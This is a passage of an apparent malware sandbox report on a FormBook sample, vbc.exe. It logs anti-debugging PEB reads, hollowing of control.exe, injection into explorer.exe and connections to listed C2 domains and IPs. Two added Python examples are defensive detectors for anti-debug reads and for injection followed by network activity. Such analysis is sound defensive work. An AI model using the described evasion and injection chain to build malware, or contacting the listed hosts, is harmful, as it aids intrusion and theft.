Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 mov eax, dword ptr fs:[00000030h] 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01688F6A mov eax, dword ptr fs:[00000030h] 6_2_01688F6A
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CEF40 mov eax, dword ptr fs:[00000030h] 6_2_015CEF40
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CFF60 mov eax, dword ptr fs:[00000030h] 6_2_015CFF60
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DF716 mov eax, dword ptr fs:[00000030h] 6_2_015DF716
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EA70E mov eax, dword ptr fs:[00000030h] 6_2_015EA70E
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EA70E mov eax, dword ptr fs:[00000030h] 6_2_015EA70E
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DB73D mov eax, dword ptr fs:[00000030h] 6_2_015DB73D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DB73D mov eax, dword ptr fs:[00000030h] 6_2_015DB73D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0168070D mov eax, dword ptr fs:[00000030h] 6_2_0168070D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0168070D mov eax, dword ptr fs:[00000030h] 6_2_0168070D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EE730 mov eax, dword ptr fs:[00000030h] 6_2_015EE730
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0164FF10 mov eax, dword ptr fs:[00000030h] 6_2_0164FF10
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0164FF10 mov eax, dword ptr fs:[00000030h] 6_2_0164FF10
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B4F2E mov eax, dword ptr fs:[00000030h] 6_2_015B4F2E
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B4F2E mov eax, dword ptr fs:[00000030h] 6_2_015B4F2E
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F37F5 mov eax, dword ptr fs:[00000030h] 6_2_015F37F5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C8794 mov eax, dword ptr fs:[00000030h] 6_2_015C8794
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01637794 mov eax, dword ptr fs:[00000030h] 6_2_01637794
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01637794 mov eax, dword ptr fs:[00000030h] 6_2_01637794
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01637794 mov eax, dword ptr fs:[00000030h] 6_2_01637794
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h] 6_2_015C7E41
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h] 6_2_015C7E41
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h] 6_2_015C7E41
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h] 6_2_015C7E41
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h] 6_2_015C7E41
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C7E41 mov eax, dword ptr fs:[00000030h] 6_2_015C7E41
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167AE44 mov eax, dword ptr fs:[00000030h] 6_2_0167AE44
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167AE44 mov eax, dword ptr fs:[00000030h] 6_2_0167AE44
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h] 6_2_015DAE73
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h] 6_2_015DAE73
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h] 6_2_015DAE73
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h] 6_2_015DAE73
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DAE73 mov eax, dword ptr fs:[00000030h] 6_2_015DAE73
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C766D mov eax, dword ptr fs:[00000030h] 6_2_015C766D
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EA61C mov eax, dword ptr fs:[00000030h] 6_2_015EA61C
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EA61C mov eax, dword ptr fs:[00000030h] 6_2_015EA61C
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0166FE3F mov eax, dword ptr fs:[00000030h] 6_2_0166FE3F
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BC600 mov eax, dword ptr fs:[00000030h] 6_2_015BC600
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BC600 mov eax, dword ptr fs:[00000030h] 6_2_015BC600
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BC600 mov eax, dword ptr fs:[00000030h] 6_2_015BC600
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E8E00 mov eax, dword ptr fs:[00000030h] 6_2_015E8E00
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671608 mov eax, dword ptr fs:[00000030h] 6_2_01671608
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BE620 mov eax, dword ptr fs:[00000030h] 6_2_015BE620
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E36CC mov eax, dword ptr fs:[00000030h] 6_2_015E36CC
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F8EC7 mov eax, dword ptr fs:[00000030h] 6_2_015F8EC7
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0166FEC0 mov eax, dword ptr fs:[00000030h] 6_2_0166FEC0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01688ED6 mov eax, dword ptr fs:[00000030h] 6_2_01688ED6
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E16E0 mov ecx, dword ptr fs:[00000030h] 6_2_015E16E0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C76E2 mov eax, dword ptr fs:[00000030h] 6_2_015C76E2
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016346A7 mov eax, dword ptr fs:[00000030h] 6_2_016346A7
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01680EA5 mov eax, dword ptr fs:[00000030h] 6_2_01680EA5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01680EA5 mov eax, dword ptr fs:[00000030h] 6_2_01680EA5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01680EA5 mov eax, dword ptr fs:[00000030h] 6_2_01680EA5
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0164FE87 mov eax, dword ptr fs:[00000030h] 6_2_0164FE87
Source: C:\Users\user\Desktop\vbc.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_015F9910
Source: C:\Users\user\Desktop\vbc.exe Memory allocated: page read and write | page guard
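The fs:[00000030h] reads listed above load the PEB pointer. On their own they are not proof of debugger detection: the C runtime and the loader read PEB fields such as ProcessHeap and Ldr constantly, and only the instruction that follows tells you whether the code is looking at BeingDebugged or NtGlobalFlag. The scanner below is an added example, not the sandbox's own signature logic and not code from the FormBook sample; it decodes the 32-bit encodings of the FS load (the WOW64 code the report shows, not x64 gs:[60h]) and classifies the PEB field read next. The byte buffer it runs on is constructed by hand to show the three cases.

```python
"""Classify 32-bit x86 'mov r32, fs:[0x30]' PEB reads by the field accessed next.

Added example for this report; it is not tooling from the sandbox vendor and it does not
analyse vbc.exe itself.  SAMPLE is a hand-built byte string, not bytes from the sample.
"""
import struct

FS_PREFIX = 0x64
PEB_DISP = 0x30   # fs:[0x30] -> PEB in a 32-bit process; fs:[0x18] is the TEB self pointer
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# 32-bit PEB fields.  0x02 and 0x68 are the classic anti-debug reads; the others are
# everyday runtime/loader traffic and must not be flagged on their own.
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}
ANTI_DEBUG_FIELDS = {"BeingDebugged", "NtGlobalFlag"}


def decode_fs_load(buf, i):
    """Return (dest_reg, disp32, length) if buf[i:] is 'mov r32, dword ptr fs:[disp32]'."""
    if buf[i] != FS_PREFIX or i + 2 > len(buf):
        return None
    op = buf[i + 1]
    if op == 0xA1 and i + 6 <= len(buf):                 # 64 A1 disp32: mov eax, moffs32
        return "eax", struct.unpack_from("<I", buf, i + 2)[0], 6
    if op == 0x8B and i + 7 <= len(buf):                 # 64 8B /r with mod=00 rm=101: disp32
        modrm = buf[i + 2]
        if modrm & 0xC7 == 0x05:
            return REG32[(modrm >> 3) & 7], struct.unpack_from("<I", buf, i + 3)[0], 7
    return None


def field_read_after(buf, i, base_reg):
    """disp8 of a '[base_reg + disp8]' operand in the instruction at buf[i:], else None.

    Covers mov r8/r32 (8A/8B), movzx r32, byte (0F B6), cmp byte/dword, imm8 (80 /7, 83 /7)
    and test byte, imm8 (F6 /0): the forms compilers and hand-written stubs use here.
    """
    base = REG32.index(base_reg)
    if base == 4:                                        # rm=100 means SIB, never esp
        return None
    op = buf[i:i + 2]
    if not op:
        return None
    if op[0] in (0x8A, 0x8B) and len(buf) > i + 2:
        modrm, disp = buf[i + 1], buf[i + 2]
        if modrm >> 6 == 1 and modrm & 7 == base:
            return disp
    if op == b"\x0F\xB6" and len(buf) > i + 3:
        modrm, disp = buf[i + 2], buf[i + 3]
        if modrm >> 6 == 1 and modrm & 7 == base:
            return disp
    if op[0] in (0x80, 0x83, 0xF6) and len(buf) > i + 3:
        modrm, disp = buf[i + 1], buf[i + 2]
        ext = (modrm >> 3) & 7
        want = 0 if op[0] == 0xF6 else 7                 # F6 /0 = test, 80 /7 and 83 /7 = cmp
        if modrm >> 6 == 1 and modrm & 7 == base and ext == want:
            return disp
    return None


def scan_peb_reads(buf):
    """Walk buf, stepping over decoded FS loads, and report every fs:[0x30] read."""
    hits, i = [], 0
    while i < len(buf):
        dec = decode_fs_load(buf, i)
        if dec is None:
            i += 1                                       # not an FS load: slide one byte
            continue
        reg, disp, length = dec
        if disp == PEB_DISP:
            off = field_read_after(buf, i + length, reg)
            field = PEB_FIELDS.get(off, None if off is None else f"PEB+0x{off:02x}")
            hits.append({"offset": i, "reg": reg, "field": field,
                         "anti_debug": field in ANTI_DEBUG_FIELDS})
        i += length
    return hits


# Constructed input: a BeingDebugged check, an NtGlobalFlag heap-flag check, and a benign
# ProcessHeap fetch of the kind the CRT emits.  Not bytes taken from vbc.exe.
SAMPLE = bytes.fromhex(
    "64A130000000"    # mov eax, fs:[30h]
    "0FB64002"        # movzx eax, byte ptr [eax+2]      ; PEB.BeingDebugged
    "85C0" "7502" "31C0"
    "64A130000000"    # mov eax, fs:[30h]
    "8B4068"          # mov eax, [eax+68h]               ; PEB.NtGlobalFlag
    "A870"            # test al, 70h                     ; FLG_HEAP_* debug flags
    "648B0D30000000"  # mov ecx, fs:[30h]
    "8B4118"          # mov eax, [ecx+18h]               ; PEB.ProcessHeap (benign)
    "C3"
)

if __name__ == "__main__":
    for hit in scan_peb_reads(SAMPLE):
        print(hit)
```

Only the first two hits are worth a signature; the third is the pattern that makes a raw count of fs:[30h] reads (several hundred in this report) a weak indicator by itself.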

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 192.185.131.238 80
Source: C:\Windows\explorer.exe Network Connect: 108.167.169.56 80
Source: C:\Windows\explorer.exe Network Connect: 103.141.97.24 80
Source: C:\Windows\explorer.exe Domain query: www.funwave.info
Source: C:\Windows\explorer.exe Domain query: www.tadeumilhosrp.com
Source: C:\Windows\explorer.exe Domain query: www.reprograme-se10x.com
Source: C:\Users\user\Desktop\vbc.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: AF0000
Source: C:\Users\user\Desktop\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
Source: C:\Users\user\Desktop\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\vbc.exe Memory written: C:\Users\user\Desktop\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\vbc.exe Thread register set: target process: 3688
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3688
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.534282769.000000000081C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.410398740.0000000000778000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.472236722.0000000000D70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000000.534743578.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.451806770.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.472236722.0000000000D70000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
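The evasion lines above describe one chain: vbc.exe overwrites its own image at 400000 with a new MZ header, hollows control.exe (section unmapped, then an executable section mapped), both vbc.exe and control.exe map executable memory into explorer.exe and hijack a thread there (thread register set, APC queued), and explorer.exe, a Windows system process, then resolves the C2 domains and connects out on port 80. The correlation below is an added example, not the sandbox vendor's signature engine; it reproduces the "system process connects to network after code injection" logic over a constructed event list modelled on those lines. The svchost.exe event is an invented control case, and the thread-register target that the report gives as PID 3688 is written as explorer.exe for readability.

```python
"""Correlate sandbox behaviour events into the "system process connects to network after
code injection" signature.

Added example written for this report; it is not the sandbox's own rule engine.  EVENTS is
constructed from the kinds of lines in the evasion section, not parsed from the report.
"""
from collections import defaultdict

VBC = r"C:\Users\user\Desktop\vbc.exe"
CONTROL = r"C:\Windows\SysWOW64\control.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SVCHOST = r"C:\Windows\System32\svchost.exe"          # constructed control case, not observed

INJECTION_ACTIONS = {"section_unmapped", "section_loaded", "memory_written",
                     "thread_register_set", "thread_apc_queued"}
NETWORK_ACTIONS = {"network_connect", "domain_query"}
EXEC_PROT = "execute and read and write"

EVENTS = [
    {"seq": 1, "source": VBC, "action": "process_created", "target": VBC},
    {"seq": 2, "source": VBC, "action": "memory_written", "target": VBC},            # self, base 400000
    {"seq": 3, "source": VBC, "action": "section_unmapped", "target": CONTROL},
    {"seq": 4, "source": VBC, "action": "section_loaded", "target": CONTROL, "protection": EXEC_PROT},
    {"seq": 5, "source": VBC, "action": "thread_register_set", "target": EXPLORER},
    {"seq": 6, "source": VBC, "action": "thread_apc_queued", "target": EXPLORER},
    {"seq": 7, "source": CONTROL, "action": "section_loaded", "target": EXPLORER, "protection": EXEC_PROT},
    {"seq": 8, "source": EXPLORER, "action": "domain_query", "target": "www.funwave.info"},
    {"seq": 9, "source": EXPLORER, "action": "network_connect", "target": "192.185.131.238:80"},
    {"seq": 10, "source": SVCHOST, "action": "network_connect", "target": "10.0.0.1:80"},
]


def is_system_process(path):
    """System process by image location; good enough for a sandbox, not a security boundary."""
    return path.lower().startswith("c:\\windows\\")


def origins(proc, injected_by):
    """Root processes of the injection chain into proc: injectors that nobody injected into."""
    roots, stack, seen = set(), list(injected_by.get(proc, ())), set()
    while stack:
        p = stack.pop()
        if p in seen:
            continue
        seen.add(p)
        parents = injected_by.get(p)
        if parents:
            stack.extend(parents)
        else:
            roots.add(p)
    return roots


def correlate(events):
    """Alerts for network activity by a system process that was injected into earlier.

    injected_by maps a target to the processes that wrote code into it or hijacked one of
    its threads before the network event.  Self-writes (source == target) are the in-place
    unpacking step and are not cross-process injection, so they are ignored.  A hop through
    a hollowed intermediate (control.exe here) still resolves back to the original dropper.
    """
    injected_by = defaultdict(set)
    unmapped, hollowed, alerts = set(), set(), []
    for ev in sorted(events, key=lambda e: e["seq"]):
        src, act, tgt = ev["source"], ev["action"], ev["target"]
        if act in INJECTION_ACTIONS and src != tgt:
            injected_by[tgt].add(src)
            if act == "section_unmapped":
                unmapped.add((src, tgt))
            elif (act == "section_loaded" and ev.get("protection") == EXEC_PROT
                  and (src, tgt) in unmapped):
                hollowed.add(tgt)                      # unmap + executable map = hollowing
        elif act in NETWORK_ACTIONS and is_system_process(src) and injected_by.get(src):
            alerts.append({
                "seq": ev["seq"],
                "process": src,
                "destination": tgt,
                "injectors": sorted(injected_by[src]),
                "origins": sorted(origins(src, injected_by)),
                "via_hollowed": sorted(p for p in injected_by[src] if p in hollowed),
            })
    return alerts


if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```

Ordering is what makes this a signature rather than a lookup: the network event only counts if the injection into that process was seen first, so a system process that talks to the network without any earlier cross-process write (the svchost.exe control case) is not flagged.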
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Users\user\Desktop\vbc.exe VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
